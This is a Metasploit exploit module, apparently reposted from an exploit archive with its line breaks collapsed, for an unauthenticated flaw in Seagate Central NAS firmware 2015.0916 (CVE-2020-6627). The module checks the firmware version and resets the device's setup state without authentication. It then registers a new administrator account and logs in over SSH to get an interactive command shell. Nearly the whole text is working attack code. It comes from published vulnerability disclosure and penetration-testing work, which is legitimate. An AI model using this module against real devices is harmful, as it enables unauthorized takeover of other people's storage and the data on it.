Seagate Central Storage 2015.0916 User Creation / Command Execution

### Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)# Date: Dec 9 2019# Exploit Author: Ege Balci# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/# Version: 2015.0916# CVE : 2020-6627# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/http'require 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SSH  def initialize(info={})    super(update_info(info,      'Name'           => "Seagate Central External NAS Arbitrary User Creation",      'Description'    => %q{        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state        and register a new admin user which is capable of SSH access.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Ege Balcı <[email protected]>' # author & msf module        ],      'References'     =>        [          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],          ['CVE', '2020-6627']        ],      'DefaultOptions'  =>        {          'SSL' => false,          'WfsDelay' => 5,        },      'Platform'       => ['unix'],      'Arch'           => [ARCH_CMD],      'Payload'        =>      {        'Compat' => {          'PayloadType'    => 'cmd_interact',          'ConnectionType' => 'find'        }      },      'Targets'        =>        [          ['Auto',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD            }          ],        ],      'Privileged'     => true,      'DisclosureDate' => "Dec 9 2019",      'DefaultTarget'  => 0    ))    register_options(      [        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])      ], self.class    )    register_advanced_options(      [        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])      ]    )  end  def check    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')      Exploit::CheckCode::Appears    else      Exploit::CheckCode::Safe    end  end  def exploit    # First get current state    first_state=get_state()    if first_state      print_status("Current device state: #{first_state['state']}")    else      return    end    if first_state['state'] != 'start'      # Set new start state      first_state['state'] = 'start'      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),        'ctype' => 'application/x-www-form-urlencoded',        'data'  => "info=#{first_state.to_json}"      },60)      changed_state=get_state()      if changed_state && changed_state['state'] == 'start'        print_good("State successfully changed !")      else        print_error("Could not change device state")        return      end    end    name = Rex::Text.rand_name_male    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)    print_status('Creating new admin user...')    print_status("User: #{user}")    print_status("Pass: #{pass}")    # Add new admin user    res = send_request_cgi({      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}    },60)    conn = do_login(user,pass)    if conn      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")      handler(conn.lsock)    end  end  def do_login(user, pass)    factory = ssh_socket_factory    opts = {      :auth_methods    => ['password', 'keyboard-interactive'],      :port            => 22,      :use_agent       => false,      :config          => false,      :password        => pass,      :proxy           => factory,      :non_interactive => true,      :verify_host_key => :never    }    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']    begin      ssh = nil      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        ssh = Net::SSH.start(rhost, user, opts)      end    rescue Rex::ConnectionError      fail_with Failure::Unreachable, 'Connection failed'    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"      return    rescue ::Timeout::Error      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"      return    rescue Net::SSH::AuthenticationFailed      print_error "#{rhost}:#{rport} SSH - Failed authentication"    rescue Net::SSH::Exception => e      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"      return    end    if ssh      conn = Net::SSH::CommandStream.new(ssh)      ssh = nil      return conn    end    return nil  end  def get_state    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && (res.code == 200 ||res.code == 100)      return res.get_json_document    end    res = nil  endend